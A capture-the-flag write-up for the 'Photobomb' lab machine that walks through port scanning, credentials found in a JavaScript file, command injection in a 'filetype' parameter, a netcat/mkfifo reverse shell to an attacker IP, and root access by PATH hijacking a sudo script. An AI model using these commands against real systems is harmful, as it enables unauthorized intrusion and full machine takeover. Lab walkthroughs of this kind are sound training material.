Photobomb - Writeup

Port scanning:

Shell

sudo nmap -p- -sS –min-rate 5000 –open -vvv -n -Pn 10.10.11.182

Shell

sudo nmap -p- -sS –min-rate 5000 –open -vvv -n -Pn 10.10.11.182
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 21:35 UTC
Initiating SYN Stealth Scan at 21:35
Scanning 10.10.11.182 [65535 ports]
Discovered open port 80/tcp on 10.10.11.182
Discovered open port 22/tcp on 10.10.11.182
Completed SYN Stealth Scan at 21:35, 14.75s elapsed (65535 total ports)
Nmap scan report for 10.10.11.182
Host is up, received user-set (0.078s latency).
Scanned at 2022-10-09 21:35:44 UTC for 14s
Not shown: 65343 closed tcp ports (reset), 190 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds
           Raw packets sent: 72838 (3.205MB) | Rcvd: 66693 (2.668MB)

Scanning of services and versions:

Shell

nmap -sCV -p22,80 10.10.11.182

Adding the IP and Host to the /etc/hosts file:

Shell

# Static table lookup for hostnames.
# See hosts(5) for details.
127.0.0.1       localhost
::1             localhost
127.0.0.1       archlinux.localhost archlinux
10.10.11.182    photobomb.htb

1 – Check the main website:

Accessing to http://photobomb.htb we can see the following web site:

Analyzing the web content we can see a link under the text “Click Here” which shows us a login panel:

2 – Check the source code:

Inside the source code there is a linked javascript file called photobomb.js:

The javascript code has the following content, in which we can see an authentication link containing the access credentials:

User: pH0t0

Password: b0Mb!

We can access directly using the complete link: http://pH0t0:b0Mb!@photobomb.htb/printer

After accessing, the web redirects us to the following download utility

Intercepting the download request with Burpsuite we obtain its content:

Download request intercepted with Burpsuite

We will check which of all the parameters is vulnerable to remote command execution (RCE). In this case the vulnerable parameter is filetype.

We try to check it by executing a ping to our machine:

Shell

; ping -c1 YOUR_IP

To receive the response we must keep listening for ICMP traces with the command tcpdump:

Shell

sudo tcpdump -i tun0 -n icmp

-i : specify the interface – tun0
-n: type of package to be received – ping command send Internet Control Message Protocol (ICMP) https://en.wikipedia.org/wiki/Ping_(networking_utility)

After sending the request with Burpsuite we receive the ICMP trace.

We also run a reverse shell with netcat (nc) and mkfifo to gain remote access to the machine:

Shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.38 1234 >/tmp/f

We perform a TTY treatment to work more comfortably:

script /dev/null -c bash
Ctrl + Z
stty raw -echo; fg
reset xterm

At this point we can read the user flag.

PRIVILEGE ESCALATION

We check the privileges of the wizard user with the command: sudo -l

The wizard user can run the cleanup.sh script as the root user without providing a password, its contents are as follows:

This scripts contains calls to diferent system command (cat, truncate and find).

As you can see, the cat and truncate commands are called differently from the find command in the source code.

The /bin/cat/ is an Absolute call and the find is a Relative call:

The use of Relative calls makes the script have to look for the command in the system variable PATH, to find its path, this is a problem if an external user has the ability to modify the contents of the PATH. This generates the attack called Path Hijacking.

To make a Path Hijacking to the find function, we will follow the following steps:

Create an evil file with named the same as the command (find)

Shell

echo "chmod u+s /bin/bash" > /tmp/find

Assign execution permissions to our find file:

Shell

chmod +x /tmp/find

The SETENV variable, allows us to modify environment variables temporarily, as the PATH is an environment variable, we can modify it directly in the sudo call as follows:

Shell

sudo PATH=/tmp:$PATH -u root /opt/cleanup.sh

At this point the script will have executed our malicious find file.

Executing Bash with -p param to run it in privilege mode:

Shell

bash -p

Finally, we got root access.